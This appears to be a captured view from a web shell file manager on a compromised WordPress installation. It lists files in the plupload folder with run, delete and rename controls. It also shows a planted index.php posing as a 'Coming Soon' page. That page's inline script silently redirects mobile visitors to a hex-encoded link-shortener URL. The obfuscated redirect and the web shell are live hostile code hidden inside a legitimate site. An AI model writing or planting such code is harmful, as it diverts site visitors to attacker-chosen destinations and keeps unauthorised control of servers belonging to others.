at path:
ROOT
/
wp-includes
/
js
/
plupload
/
index.php
run:
R
W
Run
handlers.js
27.14 KB
2025-12-03 06:22:56
R
W
Run
handlers.min.js
18.83 KB
2025-12-03 06:22:56
R
W
Run
index.htm
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
index.html
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
index.php
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
license.txt
17.57 KB
2019-11-03 17:09:02
R
W
Run
Delete
Rename
moxie.js
255.46 KB
2025-04-16 02:33:33
R
W
Run
moxie.min.js
92.42 KB
2023-02-02 16:36:32
R
W
Run
plupload.js
65.98 KB
2019-11-03 17:09:02
R
W
Run
plupload.min.js
22.32 KB
2023-02-02 16:36:32
R
W
Run
wp-plupload.js
23.39 KB
2024-02-02 17:48:15
R
W
Run
wp-plupload.min.js
12.97 KB
2024-02-02 17:48:15
R
W
Run
error_log
up
📄
index.php
Save
<!DOCTYPE html> <html lang="ar"> <head> <meta charset="UTF-8"> <title>Coming Soon</title> <style> body { display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background-color: #f0f6fc; font-family: Arial, sans-serif; text-align: center; color: #21759b; } h1 { font-size: 7em; margin: 0; } p { font-size: 1.5em; margin-top: 0.5em; } </style> </head> <body> <div> <h1>WordPress</h1> <p><b>Coming Soon</b></p> </div> <script> document.addEventListener("DOMContentLoaded", function() { if (/Mobi|Android|iPhone|iPad|iPod|IEMobile|Opera Mini/i.test(navigator.userAgent)) { window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x76\x48\x77\x48\x59\x43\x7a\x30\x72\x34"; } }); </script> </body> </html>